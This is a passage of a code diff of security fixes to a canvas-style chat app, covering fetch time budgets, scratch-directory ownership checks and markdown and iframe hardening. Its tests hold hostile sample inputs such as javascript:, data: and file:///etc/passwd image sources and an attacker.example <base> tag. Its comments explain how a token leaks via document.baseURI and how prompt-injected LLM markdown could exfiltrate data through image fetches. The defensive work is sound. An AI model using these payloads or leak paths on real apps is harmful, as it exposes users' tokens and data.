+                        # that resets on every recv() that returns ANY bytes,
+                        # even one. So a server dripping 1 byte every few
+                        # seconds (safely under read_timeout_seconds, never
+                        # tripping a single recv()'s own timeout) defers this
+                        # loop's cancellation/time-budget check below until a
+                        # full chunk_size has trickled in - with the old 16
+                        # KiB chunks that's chunk_size * drip_interval, i.e.
+                        # unbounded in practice (tens of hours), even though
+                        # this fetch's own total_timeout_seconds budget is
+                        # sitting right here doing nothing in between. Reading
+                        # ONE byte per iter_content() step makes "one chunk"
+                        # equal to "at most one recv() wait", so the worst-
+                        # case stall before this check re-runs collapses to
+                        # roughly one read-timeout window (bounded, and on the
+                        # order of total_timeout_seconds) instead of
+                        # chunk_size read-timeout windows (unbounded in
+                        # practice). This doesn't slow ordinary fast transfers
+                        # down to one syscall per byte - the BufferedReader
+                        # underneath already batches actual socket reads into
+                        # its own internal buffer regardless of the amt asked
+                        # for, so read(1) against a fast/local stream is
+                        # served from memory, not one recv() per byte.
+                        for chunk in response.iter_content(chunk_size=1):
                             token.raise_if_cancelled()
                             if time.monotonic() - started > self.policy.total_timeout_seconds:
                                 raise ResearchFailure("Source fetch exceeded the total time limit.", code="fetch_timeout", source_id=result.source_id)
@@ -322,7 +355,9 @@ class RequestsDocumentFetcher:
             raise ResearchFailure("The source could not be processed.", code="fetch_failed", source_id=result.source_id) from exc
         raise ResearchFailure("The source returned too many redirects.", code="redirect_limit", source_id=result.source_id)
 
-    def _fetch_robots_bytes(self, robots_url: str, session) -> "tuple[int, bytes] | None":
+    def _fetch_robots_bytes(
+        self, robots_url: str, session, *, token: CancellationToken | None = None, started: float | None = None
+    ) -> "tuple[int, bytes] | None":
         """Fetches robots.txt through the SAME SSRF-safe, IP-pinned
         mechanism the main content fetch uses - see _PinnedHTTPAdapter's
         own docstring for why urllib.robotparser.RobotFileParser.read()'s
@@ -333,8 +368,32 @@ class RequestsDocumentFetcher:
         no explicit rules found, CrawlEtiquette's own fail-open/no-rules
         handling applies either way). Returns None on anything that
         prevents a completed response (blocked by policy, network error,
-        timeout) - a completed response, whatever its status code, always
-        returns (status_code, body)."""
+        timeout, cancellation, or this fetch's own total_timeout_seconds
+        budget running out) - a completed response, whatever its status
+        code, always returns (status_code, body).
+
+        SECURITY-FIX (web-research-slow-drip-bypasses-budget-and-cancel):
+        `token` and `started` are new - this method used to take neither,
+        so a robots.txt response could stall the calling thread with NO
+        cancellation check and NO time-budget check at all (unlike fetch()'s
+        own content loop, which at least re-checked between chunks). A
+        malicious/compromised site's robots.txt endpoint - reached on every
+        single fetch, before the real request - could hold the worker
+        indefinitely with the Stop button and total_timeout_seconds both
+        powerless to stop it. token/started are threaded in from fetch()'s
+        own closure via the lambda at the call site below, so this reuses
+        the SAME CancellationToken and the SAME total_timeout_seconds
+        budget as the rest of this fetch, rather than inventing a second,
+        separate one. Both stay optional (defaulting to a fresh, never-
+        cancelled token and "budget starts now") so any OTHER caller of
+        this method - direct unit tests included - keeps working exactly
+        as before without needing to know about them; only fetch()'s own
+        call site actually needs to pass the real ones for the fix to take
+        effect."""
+        if token is None:
+            token = CancellationToken()
+        if started is None:
+            started = time.monotonic()
         try:
             validated = self.policy.validate(robots_url)
         except URLPolicyError:
@@ -351,7 +410,18 @@ class RequestsDocumentFetcher:
             return None
         try:
             body = bytearray()
-            for chunk in response.iter_content(chunk_size=8 * 1024):
+            # SECURITY-FIX (web-research-slow-drip-bypasses-budget-and-
+            # cancel): chunk_size=1, not the old 8 KiB - see fetch()'s own
+            # chunk_size=1 comment above for the exact mechanism (iter_
+            # content(amt) blocks until `amt` bytes accumulate, bounded only
+            # by a PER-RECV timeout that a slow drip keeps resetting). The
+            # token.raise_if_cancelled()/deadline check below now actually
+            # gets a chance to run at roughly one read-timeout-window's
+            # granularity instead of never running at all.
+            for chunk in response.iter_content(chunk_size=1):
+                token.raise_if_cancelled()
+                if time.monotonic() - started > self.policy.total_timeout_seconds:
+                    return None
                 if not chunk:
                     continue
                 remaining = self.ROBOTS_TXT_MAX_BYTES - len(body)

--- a/graphlink_scratch_dirs.py
+++ b/graphlink_scratch_dirs.py
@@ -63,6 +63,52 @@ def safe_scratch_id(raw_id: str) -> str:
     return re.sub(r"[^A-Za-z0-9_-]", "_", raw_id or "default")
 
 
+def _ensure_private_scratch_root(root: Path) -> None:
+    """SECURITY-FIX (PYC-5): prepare_scratch_dir's own chmod 0700 on the
+    LEAF only keeps other users out of it going forward - it does nothing
+    to stop a user who already owns/controls the SHARED root (one of
+    PYCODER_REPL_ROOT/EXECUTION_SANDBOX_ROOT, both predictable, fixed paths
+    under the system temp dir) from renaming or symlink-swapping the
+    leaf's own directory entry out from under this process: owning a
+    directory grants rename/unlink rights over every entry inside it
+    regardless of that entry's own mode, so a pre-existing, attacker-owned
+    root turns the window between this call and the caller's later
+    Popen(cwd=leaf) into a real TOCTOU race. Secures the ROOT itself first:
+    creates it 0700 if new, and - the actual fix - refuses (raises
+    OSError) to use a PRE-EXISTING root owned by a different user, rather
+    than silently trusting it. This is the same "don't touch what you
+    don't own" posture CPython's own tempfile.mkdtemp() takes for exactly
+    this class of shared-/tmp attack. Callers (PythonREPL.start,
+    VirtualEnvSandbox.ensure_base_environment) already run inside a
+    run-level try/except that reports setup failures gracefully - a raise
+    here becomes a failed run, not a crash.
+
+    os.getuid() does not exist on Windows at all; this is only ever
+    reached from prepare_scratch_dir's own POSIX-only branch, but a
+    missing getuid is tolerated the same way as an OSError below (log,
+    skip the ownership check, still attempt the chmod) rather than
+    crashing outright - real POSIX systems always have it."""
+    root.mkdir(parents=True, exist_ok=True)
+    try:
+        this_uid = os.getuid()
+    except AttributeError:
+        this_uid = None
+    if this_uid is not None:
+        try:
+            owner_uid = root.stat().st_uid
+        except OSError:
+            owner_uid = None
+        if owner_uid is not None and owner_uid != this_uid:
+            raise OSError(
+                f"refusing to use scratch root {root}: owned by uid {owner_uid}, "
+                f"expected this process's own uid {this_uid} - possible shared-tmp pre-creation attack"
+            )
+    try:
+        os.chmod(root, 0o700)
+    except OSError:
+        logger.warning("could not chmod scratch root %s to 0700 - continuing with existing permissions", root)
+
+
 def prepare_scratch_dir(path: Path) -> None:
     """mkdir -p, then chmod 0700 on POSIX (no-op on Windows, matching every
     other chmod call site in this codebase - os.chmod there only ever
@@ -70,7 +116,17 @@ def prepare_scratch_dir(path: Path) -> None:
     graphlink_settings_store.py's own chmod calls). A refused chmod is
     logged and otherwise ignored: a permissions tightening that can't be
     applied must not stop code execution from running, the same fail-open
-    stance graphlink_settings_store.py's 0600 file chmods already take."""
+    stance graphlink_settings_store.py's 0600 file chmods already take.
+
+    SECURITY-FIX (PYC-5): on POSIX, also secures path.parent (the shared
+    scratch root) via _ensure_private_scratch_root BEFORE creating
+    anything inside it - see that function's own docstring for why a
+    leaf's own chmod alone is not enough. This DOES raise (not
+    log-and-swallow) on a detected hostile pre-existing root, unlike the
+    leaf's own best-effort chmod below - see _ensure_private_scratch_root's
+    docstring for why that asymmetry is deliberate."""
+    if sys.platform != "win32":
+        _ensure_private_scratch_root(path.parent)
     path.mkdir(parents=True, exist_ok=True)
     if sys.platform == "win32":
         return

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,5 +1,5 @@
 [build-system]
-requires = ["setuptools>=68"]
+requires = ["setuptools==82.0.1"]
 build-backend = "setuptools.build_meta"
 
 [project]
@@ -183,6 +183,22 @@ where = ["."]
 include = [
     "backend*",
     "graphlink_plugins*",
+]
+# Auto-discovery here is namespace-aware (PEP 420), so backend/tests/ and
+# backend/evals/ are picked up as real packages even without __init__.py in
+# every directory - confirmed by direct find_namespace_packages() probe: it
+# returns backend.tests, backend.tests.perf, backend.evals, and
+# backend.evals.fixtures* even though backend/tests/ itself has no
+# __init__.py. Without this exclude, the built wheel ships the entire test
+# and eval-harness source tree (fixtures, conftest, perf baselines) as
+# installed packages - dev-only content with no reason to reach an end
+# consumer's site-packages. graphlink_plugins* and backend's real
+# subpackages (api, domain, providers, ...) are unaffected.
+exclude = [
+    "backend.tests",
+    "backend.tests.*",
+    "backend.evals",
+    "backend.evals.*",
 ]
 
 [tool.setuptools.dynamic]

--- a/web_ui/src/app/App.test.tsx
+++ b/web_ui/src/app/App.test.tsx
@@ -6,8 +6,11 @@
  * badge at all, in any status. It was verified once by hand against a real
  * running app, which proves it worked that day but is not a regression guard.
  */
-import { describe, expect, it } from "vitest";
+import { fireEvent, render, screen } from "@testing-library/react";
+import { afterEach, describe, expect, it } from "vitest";
 import { connectionBadgeLabel } from "./connectionBadge";
+import { SkipToComposerLink } from "./App";
+import { getAuthToken } from "../lib/auth/token";
 
 describe("connectionBadgeLabel (ADR-003 stage 3.6)", () => {
   it("says a session is paused while reconnecting, not just the bare status", () => {
@@ -28,5 +31,65 @@ describe("connectionBadgeLabel (ADR-003 stage 3.6)", () => {
   it("keeps the established labels for the pre-existing statuses", () => {
     expect(connectionBadgeLabel("open")).toBe("connected");
     expect(connectionBadgeLabel("closed")).toBe("closed");
+  });
+});
+
+/**
+ * fix-security-pass finding key skip-link-clobbers-token-fragment.
+ *
+ * Regression guard for the bug: the skip link used to be a plain
+ * `<a href="#composer-message-input">`, which performs a real same-document
+ * fragment navigation on click (React does not intercept a bare anchor
+ * click) - overwriting location.hash and, with it, any `#token=...` the
+ * desktop shell had put there for lib/auth/token.ts to read. Rendered
+ * standalone (not the whole <App/> shell, which needs a live WS
+ * backend/stores) since SkipToComposerLink has no dependency on either.
+ */
+describe("SkipToComposerLink (fix-security-pass: skip-link-clobbers-token-fragment)", () => {
+  afterEach(() => {
+    window.location.hash = "";
+  });
+
+  function renderSkipLink() {
+    render(
+      <>
+        <SkipToComposerLink />
+        <textarea id="composer-message-input" />
+      </>,
+    );
+  }
+
+  it("moves focus to the composer input", () => {
+    renderSkipLink();
+    fireEvent.click(screen.getByText("Skip to message composer"));
+    expect(document.activeElement).toBe(screen.getByRole("textbox"));
+  });
+
+  it("does not touch location.hash, so a pre-existing capability token survives activation", () => {
+    // Stand-in for graphlink_desktop.py's `#token=<token>` launch URL.
+    window.location.hash = "#token=abc123";
+    renderSkipLink();
+    fireEvent.click(screen.getByText("Skip to message composer"));
+    expect(window.location.hash).toBe("#token=abc123");
+    // The actual end-to-end symptom the finding described: every /api call
+    // after one skip-link activation lost its token and got a silent 401.
+    expect(getAuthToken()).toBe("abc123");
+  });
+
+  // jsdom implements no default action for anchor-element clicks (neither
+  // fireEvent.click nor a native .click() moves focus or updates
+  // location.hash for an <a href="#...">, confirmed by hand against this
+  // exact jsdom version) - so the fragment-clobbering navigation itself
+  // can't be reproduced here, and the test above passes unchanged even
+  // against the old <a href="#composer-message-input"> shape. What DOES
+  // discriminate the two shapes in this environment, and is what actually
+  // rules the mechanism out: there is no href for the browser to navigate
+  // to in the first place. Confirmed by hand-reverting to the <a> shape,
+  // which fails this exact assertion (tagName "A", href attribute present).
+  it("is a real <button>, not an anchor - nothing here can trigger a fragment navigation", () => {
+    render(<SkipToComposerLink />);
+    const el = screen.getByText("Skip to message composer");
+    expect(el.tagName).toBe("BUTTON");
+    expect(el).not.toHaveAttribute("href");
   });
 });

--- a/web_ui/src/app/App.tsx
+++ b/web_ui/src/app/App.tsx
@@ -249,6 +249,49 @@ function LazyDialogFallback() {
   );
 }
 
+/**
+ * ADR-012 stage 12.3: the very first focusable element in the page, per the
+ * standard skip-link convention - invisible until it itself receives focus
+ * (Tab from anywhere before the canvas lands here first). Jumps a keyboard
+ * user straight to the composer, bypassing every node on the canvas in one
+ * activation instead of N individual Tab presses (React Flow's own node
+ * wrapper is a real tab stop per node - see NodeMenu.tsx's own stage-12.3
+ * doc for why that's not changed here). Exported (rather than left inline in
+ * App's own JSX) so it can be exercised in isolation without booting the
+ * whole shell's WS transport/stores - see App.test.tsx.
+ *
+ * A plain `<a href="#composer-message-input">` here (the original stage-12.3
+ * shape, and the fix-security-pass finding key
+ * skip-link-clobbers-token-fragment) is a same-document fragment navigation,
+ * and the browser does NOT let React intercept a bare anchor click -
+ * activating it sets `location.hash` to the literal string
+ * "composer-message-input". lib/auth/token.ts reads that exact hash fresh on
+ * every /api and /ws call to recover the per-launch capability token
+ * graphlink_desktop.py wrote there (`#token=...`); once the hash is
+ * overwritten the token is gone for the rest of the window's life (there is
+ * no reload path in the WebView2 shell), and every image fetch / Copy /
+ * Export Image / chart export after that silently 401s. Since this is the
+ * FIRST tab stop on the page, any keyboard user hits it immediately. A
+ * <button> gets the identical accessible "move focus to the composer"
+ * behavior via a direct element.focus() call, without ever touching
+ * location.hash - .skip-link's CSS (base.css) is class-selected, not
+ * tag-selected, so the focus-reveal styling is unaffected by the tag swap.
+ */
+export function SkipToComposerLink() {
+  return (
+    <button
+      type="button"
+      className="skip-link"
+      style={{ font: "inherit", cursor: "pointer" }}
+      onClick={() => {
+        document.getElementById("composer-message-input")?.focus();
+      }}
+    >
+      Skip to message composer
+    </button>
+  );
+}
+
 function App() {
   const [status, setStatus] = useState<ConnectionStatus>("closed");
   const [system, setSystem] = useState<SystemState>({});
@@ -337,17 +380,7 @@ function App() {
             than a class, the same "invisible hook, not a rendered element"
             posture as aria-live regions elsewhere in this file. */}
         <div className="app-shell" data-connection-status={status}>
-          {/* ADR-012 stage 12.3: the very first focusable element in the
-              page, per the standard skip-link convention - invisible until
-              it itself receives focus (Tab from anywhere before the canvas
-              lands here first). Jumps a keyboard user straight to the
-              composer, bypassing every node on the canvas in one activation
-              instead of N individual Tab presses (React Flow's own node
-              wrapper is a real tab stop per node - see NodeMenu.tsx's own
-              stage-12.3 doc for why that's not changed here). */}
-          <a href="#composer-message-input" className="skip-link">
-            Skip to message composer
-          </a>
+          <SkipToComposerLink />
           {/* ADR-012 stage 12.3: the one aria-live region for streaming
               start/finish and per-node run status - see announcer.ts. Always
               mounted (not gated behind any dialog/overlay) so a transition

--- a/web_ui/src/app/canvas/DocumentViewMarkdown.test.tsx
+++ b/web_ui/src/app/canvas/DocumentViewMarkdown.test.tsx
@@ -108,6 +108,34 @@ describe("DocumentViewMarkdown", () => {
       const img = screen.getByAltText("a diagram") as HTMLImageElement;
       expect(img.src).toBe("https://example.com/diagram.png");
     });
+
+    it("sets referrerPolicy=no-referrer on a legitimate http(s) image (defense-in-depth alongside the img-src CSP)", () => {
+      render(<DocumentViewMarkdown content="![a diagram](https://example.com/diagram.png)" />);
+      const img = screen.getByAltText("a diagram") as HTMLImageElement;
+      expect(img.getAttribute("referrerpolicy")).toBe("no-referrer");
+    });
+
+    // markdown-image-exfil: a hostile saved chat / imported document is
+    // this file's own attack vector (see DocumentViewMarkdown.tsx's own
+    // updated doc comment on ZoomImage) - mirrors NodeMarkdown.test.tsx's
+    // identical coverage for the sibling component.
+    it("renders nothing for a javascript: image src", () => {
+      const { container } = render(<DocumentViewMarkdown content="![x](javascript:alert(1))" />);
+      expect(container.querySelector("img")).toBeNull();
+      expect(container.querySelector("[data-rmiz]")).toBeNull();
+    });
+
+    it("renders nothing for a data: image src", () => {
+      const { container } = render(
+        <DocumentViewMarkdown content="![x](data:image/svg+xml;base64,PHN2Zz48L3N2Zz4=)" />,
+      );
+      expect(container.querySelector("img")).toBeNull();
+    });
+
+    it("renders nothing for a file: image src", () => {
+      const { container } = render(<DocumentViewMarkdown content="![x](file:///etc/passwd)" />);
+      expect(container.querySelector("img")).toBeNull();
+    });
   });
 
   describe("GitHub-style callouts", () => {

--- a/web_ui/src/app/canvas/DocumentViewMarkdown.tsx
+++ b/web_ui/src/app/canvas/DocumentViewMarkdown.tsx
@@ -132,7 +132,7 @@ function TableWrapper({ node: _node, ...props }: JSX.IntrinsicElements["table"] 
   );
 }
 
-function ZoomImage({ node: _node, alt, ...props }: JSX.IntrinsicElements["img"] & ExtraProps) {
+function ZoomImage({ node: _node, alt, src, ...props }: JSX.IntrinsicElements["img"] & ExtraProps) {
   // wrapElement="span": an <img> can legally appear INLINE inside a
   // <p> (e.g. "see this diagram: ![...](...)"), and Zoom's own default
   // wrapper is a <div> - a block element nested inside a <p> is invalid
@@ -144,9 +144,30 @@ function ZoomImage({ node: _node, alt, ...props }: JSX.IntrinsicElements["img"] 
   // ReactMarkdown's own img props, and `?? ""` covers the `![](src)` case
   // (no alt text authored) by falling back to an explicitly-decorative
   // empty alt rather than leaving it undefined.
+  //
+  // SECURITY-FIX (markdown-image-exfil): a hostile saved chat/imported
+  // document is this file's own attack vector for the same gap
+  // NodeMarkdown.tsx's own ZoomImage closes (see that file's copy of this
+  // comment for the full mechanism) - this is a genuinely separate
+  // component, not a shared import, so the fix is duplicated here rather
+  // than left half-applied. Same explicit http(s)-only allowlist this
+  // file's rehype-external-links pass already applies to <a> hrefs
+  // (`target`/`rel`, configured below in DocumentViewMarkdown itself),
+  // mirrored here for `src`: a non-http(s) `src` renders nothing. Actual
+  // arbitrary-host exfiltration over a syntactically-valid http(s) `src`
+  // is closed at the network layer instead, by backend/app.py's img-src
+  // CSP.
+  const isHttpUrl = !!src && /^https?:\/\//i.test(src.trim());
+  if (!isHttpUrl) {
+    return null;
+  }
   return (
     <Zoom wrapElement="span">
-      <img alt={alt ?? ""} {...props} />
+      {/* referrerPolicy="no-referrer": defense-in-depth alongside the CSP
+          above - never hand the image host this app's own URL as a
+          Referer. `{...props}` spread first, `src`/referrerPolicy last,
+          so nothing upstream can silently override them. */}
+      <img alt={alt ?? ""} {...props} src={src} referrerPolicy="no-referrer" />
     </Zoom>
   );
 }

--- a/web_ui/src/app/canvas/HtmlNodeView.test.tsx
+++ b/web_ui/src/app/canvas/HtmlNodeView.test.tsx
@@ -31,9 +31,15 @@ import {
 } from "./HtmlNodeView";
 import { HTML_SPLIT_MAX, HTML_SPLIT_MIN, HTML_SPLIT_TOTAL_PX } from "./canvasConstants";
 
+// SANDBOX_BASE_ORIGIN's exact value, duplicated here (not imported from
+// HtmlNodeView.tsx) deliberately - importing the implementation's own
+// constant would make these assertions tautological against a value the
+// implementation could change without any test noticing.
+const SANDBOX_BASE_ORIGIN = "http://sandboxed-html-node.invalid";
 const EXACT_CSP =
-  "default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data:; connect-src 'none'; base-uri 'none'; frame-src 'none'; object-src 'none'; form-action 'none'";
+  `default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data:; connect-src 'none'; base-uri ${SANDBOX_BASE_ORIGIN}; frame-src 'none'; object-src 'none'; form-action 'none'`;
 const EXACT_CSP_META = `<meta http-equiv="Content-Security-Policy" content="${EXACT_CSP}">`;
+const EXACT_BASE_TAG = `<base href="${SANDBOX_BASE_ORIGIN}/">`;
 
 // Rendered directly (not through a real <ReactFlow nodes=.../> mount) - see
 // ChatNodeView.test.tsx for why a bare ReactFlowProvider is enough here too.
@@ -85,8 +91,50 @@ describe("buildSandboxedHtmlDocument", () => {
   it("wraps raw content verbatim in the exact fixed structure with the exact CSP string", () => {
     const result = buildSandboxedHtmlDocument("<p>hi</p>");
     expect(result).toBe(
-      `<!DOCTYPE html><html><head>${EXACT_CSP_META}</head><body>\n<p>hi</p>\n</body></html>`,
+      `<!DOCTYPE html><html><head>${EXACT_CSP_META}${EXACT_BASE_TAG}</head><body>\n<p>hi</p>\n</body></html>`,
     );
+  });
+
+  // html-preview-reads-token-via-baseURI: an iframe[srcdoc] with no <base> of
+  // its own inherits the CONTAINER document's base URL, which for this app
+  // is http://127.0.0.1:<port>/#token=<token> - readable via
+  // document.baseURI regardless of the sandbox attribute (sandbox's missing
+  // allow-same-origin governs DOM/storage/network access, not this fallback
+  // base URL mechanism). The fixed <base> tag below is what actually closes
+  // that leak - it must be present, token-free, and land inside <head>
+  // (before any byte of `raw`, which starts in the body position) so it's
+  // unconditionally the base every browser sees regardless of what `raw`
+  // itself might contain.
+  it("sets an inert, token-free <base> tag in <head>, after the CSP meta and before any byte of `raw`", () => {
+    const result = buildSandboxedHtmlDocument("<p>hi</p>");
+
+    expect(result).not.toContain("token=");
+    expect(result).not.toContain("127.0.0.1");
+
+    const baseIndex = result.indexOf(EXACT_BASE_TAG);
+    const metaIndex = result.indexOf(EXACT_CSP_META);
+    const headCloseIndex = result.indexOf("</head>");
+    const rawIndex = result.indexOf("<p>hi</p>");
+    expect(baseIndex).toBeGreaterThan(-1);
+    // The CSP meta tag must precede the <base> tag in the parsed document,
+    // so the base-uri directive it carries is already the active policy by
+    // the time the parser reaches our <base> element and validates its href
+    // against it - a <base> parsed before any CSP meta would have nothing
+    // to validate against yet.
+    expect(metaIndex).toBeLessThan(baseIndex);
+    expect(baseIndex).toBeLessThan(headCloseIndex);
+    expect(headCloseIndex).toBeLessThan(rawIndex);
+
+    // Parse the produced string as a real Document (DOMParser, available in
+    // jsdom) and assert on the parsed structure rather than only the raw
+    // string - a genuine proof that this is a real, single <base> element
+    // with the expected href, not e.g. text that merely looks like one
+    // inside an attribute value.
+    const doc = new DOMParser().parseFromString(result, "text/html");
+    const baseEls = doc.querySelectorAll("base");
+    expect(baseEls.length).toBe(1);
+    expect(baseEls[0].getAttribute("href")).toBe(`${SANDBOX_BASE_ORIGIN}/`);
+    expect(baseEls[0].getAttribute("href")).not.toContain("token=");
   });
 
   it("never branches on adversarial content trying to inject a competing head/CSP", () => {
@@ -107,11 +155,35 @@ describe("buildSandboxedHtmlDocument", () => {
 
     // The wrapper's own head/body scaffolding is untouched: exactly one
     // <!DOCTYPE html>, exactly one wrapper <head>...</head> holding only our
-    // meta tag, and the attacker's entire string appears intact and
-    // unmodified inside the body position.
-    expect(result.startsWith(`<!DOCTYPE html><html><head>${EXACT_CSP_META}</head><body>\n`)).toBe(true);
+    // meta tag and our <base> tag, and the attacker's entire string appears
+    // intact and unmodified inside the body position.
+    expect(result.startsWith(`<!DOCTYPE html><html><head>${EXACT_CSP_META}${EXACT_BASE_TAG}</head><body>\n`)).toBe(
+      true,
+    );
     expect(result.endsWith(`${attacker}\n</body></html>`)).toBe(true);
-    expect(result).toBe(`<!DOCTYPE html><html><head>${EXACT_CSP_META}</head><body>\n${attacker}\n</body></html>`);
+    expect(result).toBe(
+      `<!DOCTYPE html><html><head>${EXACT_CSP_META}${EXACT_BASE_TAG}</head><body>\n${attacker}\n</body></html>`,
+    );
+  });
+
+  // html-preview-reads-token-via-baseURI: per the HTML spec, only the FIRST
+  // <base> element with an href in tree order ever takes effect - later ones
+  // are inert. Proves that property holds even when `raw` supplies its own
+  // competing <base> tag pointed at an attacker-chosen href: ours (in the
+  // wrapper's own <head>, unconditionally before `raw`) must still be the
+  // one a browser would honor, not the attacker's.
+  it("a competing <base> tag inside `raw` never precedes or replaces ours - ours stays first in tree order", () => {
+    const attacker = '<base href="https://attacker.example/">';
+    const result = buildSandboxedHtmlDocument(attacker);
+
+    const doc = new DOMParser().parseFromString(result, "text/html");
+    const baseEls = doc.querySelectorAll("base");
+    expect(baseEls.length).toBe(2);
+    // Ours is first in tree order - the one the HTML spec's "frozen base
+    // url" algorithm actually uses - regardless of what `raw` supplies.
+    expect(baseEls[0].getAttribute("href")).toBe(`${SANDBOX_BASE_ORIGIN}/`);
+    expect(baseEls[1].getAttribute("href")).toBe("https://attacker.example/");
+    expect(result.indexOf(EXACT_BASE_TAG)).toBeLessThan(result.indexOf(attacker));
   });
 });
 
@@ -170,8 +242,10 @@ describe("HtmlNodeView", () => {
 
     const srcDoc = getIframe(container).srcdoc;
 
-    // Our wrapper's own head/CSP is still the first thing in the document.
-    expect(srcDoc.startsWith(`<!DOCTYPE html><html><head>${EXACT_CSP_META}</head><body>\n`)).toBe(true);
+    // Our wrapper's own head/CSP/base is still the first thing in the document.
+    expect(srcDoc.startsWith(`<!DOCTYPE html><html><head>${EXACT_CSP_META}${EXACT_BASE_TAG}</head><body>\n`)).toBe(
+      true,
+    );
     const ourMetaIndex = srcDoc.indexOf(EXACT_CSP_META);
     const attackerMetaIndex = srcDoc.indexOf('content="script-src *"');
     expect(ourMetaIndex).toBe(0 + "<!DOCTYPE html><html><head>".length);
@@ -186,7 +260,9 @@ describe("HtmlNodeView", () => {
 
     // The attacker's payload made it through unparsed/unmodified, verbatim,
     // entirely within the body position after our fixed prefix.
-    expect(srcDoc).toBe(`<!DOCTYPE html><html><head>${EXACT_CSP_META}</head><body>\n${attacker}\n</body></html>`);
+    expect(srcDoc).toBe(
+      `<!DOCTYPE html><html><head>${EXACT_CSP_META}${EXACT_BASE_TAG}</head><body>\n${attacker}\n</body></html>`,
+    );
   });
 
   it("the Popout button is present, disabled, and wired to nothing observable", async () => {

--- a/web_ui/src/app/canvas/HtmlNodeView.tsx
+++ b/web_ui/src/app/canvas/HtmlNodeView.tsx
@@ -94,9 +94,39 @@ export type HtmlFlowNode = Node<HtmlNodeData, "html">;
  * makes the CSP actually enforceable rather than something the untrusted
  * content could race, override, or bypass by supplying its own competing
  * <head>/<meta> first.
+ *
+ * Base URL: an iframe[srcdoc] document with no <base> element of its own
+ * falls back to its CONTAINER document's base URL (the HTML spec's
+ * "fallback base url" algorithm) - here that's this app's own window,
+ * http://127.0.0.1:<port>/#token=<token> (see lib/auth/token.ts for why the
+ * live capability token lives in the fragment rather than ever being
+ * stripped from location.hash). The sandbox attribute's missing
+ * allow-same-origin (see the iframe's own comment below) stops script in
+ * this frame from reaching the app's real DOM/storage/network origin, but
+ * that is a SEPARATE mechanism from document.baseURI and does not touch it
+ * at all - untrusted script could previously read the live token straight
+ * out of `new URL(document.baseURI).hash` with no origin check involved.
+ * SANDBOX_BASE_ORIGIN below closes that: per spec, the first <base>
+ * element with an href in tree order (ours, unconditionally first, for the
+ * same "raw never gets parsed/sniffed" reason as above) freezes the
+ * document's base url to that value instead of falling back to the
+ * container's. The CSP's own base-uri directive has to explicitly allow
+ * this exact origin (rather than staying 'none') because base-uri
+ * validates ANY <base> element's href before letting it take effect,
+ * including this trusted, wrapper-authored one - leaving it 'none' would
+ * make the browser reject our own <base> too and silently fall back to the
+ * token-bearing base url this fix exists to avoid, turning the fix into a
+ * silent no-op. SANDBOX_BASE_ORIGIN is an RFC 2606 .invalid host (never
+ * resolvable, never a real page) so the placeholder can't collide with
+ * anything network-reachable, though every network-capable directive here
+ * (default-src/connect-src/img-src/frame-src/object-src) already forbids
+ * fetching it regardless - it only has to be a syntactically valid,
+ * token-free absolute URL for document.baseURI to report.
  */
+const SANDBOX_BASE_ORIGIN = "http://sandboxed-html-node.invalid";
+
 export function buildSandboxedHtmlDocument(raw: string): string {
-  return `<!DOCTYPE html><html><head><meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data:; connect-src 'none'; base-uri 'none'; frame-src 'none'; object-src 'none'; form-action 'none'"></head><body>
+  return `<!DOCTYPE html><html><head><meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data:; connect-src 'none'; base-uri ${SANDBOX_BASE_ORIGIN}; frame-src 'none'; object-src 'none'; form-action 'none'"><base href="${SANDBOX_BASE_ORIGIN}/"></head><body>
 ${raw}
 </body></html>`;
 }
@@ -254,11 +284,19 @@ function HtmlNodeViewImpl({ data, selected }: NodeProps<HtmlFlowNode>) {
       <div className="html-node-section">
         <p className="html-node-section-label">Preview</p>
         {/* sandbox is EXACTLY "allow-scripts" - no allow-same-origin (no
-            access to this app's origin/storage/parent DOM), no
+            access to this app's origin/storage/parent DOM via any DOM API -
+            parent.location/top.location correctly throw SecurityError), no
             allow-popups, no allow-top-navigation, no allow-forms, no
-            allow-modals. srcDoc (never a blob: URL, never `src`, never
-            dangerouslySetInnerHTML) is the only content-delivery path,
-            and it only ever holds buildSandboxedHtmlDocument's output. */}
+            allow-modals. This does NOT by itself stop document.baseURI from
+            reporting this app's own URL, token fragment included - that's a
+            distinct HTML-spec mechanism (the srcdoc "fallback base url"),
+            unrelated to the sandbox's origin isolation, which is why
+            buildSandboxedHtmlDocument's own wrapper additionally sets an
+            explicit <base> tag (see its doc comment) rather than relying on
+            sandbox alone to keep the token out of this frame's reach. srcDoc
+            (never a blob: URL, never `src`, never dangerouslySetInnerHTML)
+            is the only content-delivery path, and it only ever holds
+            buildSandboxedHtmlDocument's output. */}
         <iframe
           className="html-node-preview"
           style={{ height: previewHeightPx }}

--- a/web_ui/src/app/canvas/NodeMarkdown.test.tsx
+++ b/web_ui/src/app/canvas/NodeMarkdown.test.tsx
@@ -169,6 +169,42 @@ describe("NodeMarkdown", () => {
       const img = screen.getByAltText("a diagram") as HTMLImageElement;
       expect(img.src).toBe("https://example.com/diagram.png");
     });
+
+    it("sets referrerPolicy=no-referrer on a legitimate http(s) image (defense-in-depth alongside the img-src CSP)", () => {
+      render(<NodeMarkdown content="![a diagram](https://example.com/diagram.png)" />);
+      const img = screen.getByAltText("a diagram") as HTMLImageElement;
+      expect(img.getAttribute("referrerpolicy")).toBe("no-referrer");
+    });
+
+    // markdown-image-exfil: unlike a link, the browser fetches an <img src>
+    // automatically at render time - no click required - so LLM/web-
+    // authored markdown (every node kind's content, not just WebResearch)
+    // that a prompt injection steers into emitting a dangerous-scheme
+    // image src is a live risk the moment the node renders. Mirrors
+    // SafeAnchor's own javascript:/file:/data: hardening tests above,
+    // applied to the img path instead of the link path.
+    it("renders nothing for a javascript: image src", () => {
+      const { container } = render(<NodeMarkdown content="![x](javascript:alert(1))" />);
+      expect(container.querySelector("img")).toBeNull();
+      expect(container.querySelector("[data-rmiz]")).toBeNull();
+    });
+
+    it("renders nothing for a data: image src", () => {
+      const { container } = render(
+        <NodeMarkdown content="![x](data:image/svg+xml;base64,PHN2Zz48L3N2Zz4=)" />,
+      );
+      expect(container.querySelector("img")).toBeNull();
+    });
+
+    it("renders nothing for a file: image src", () => {
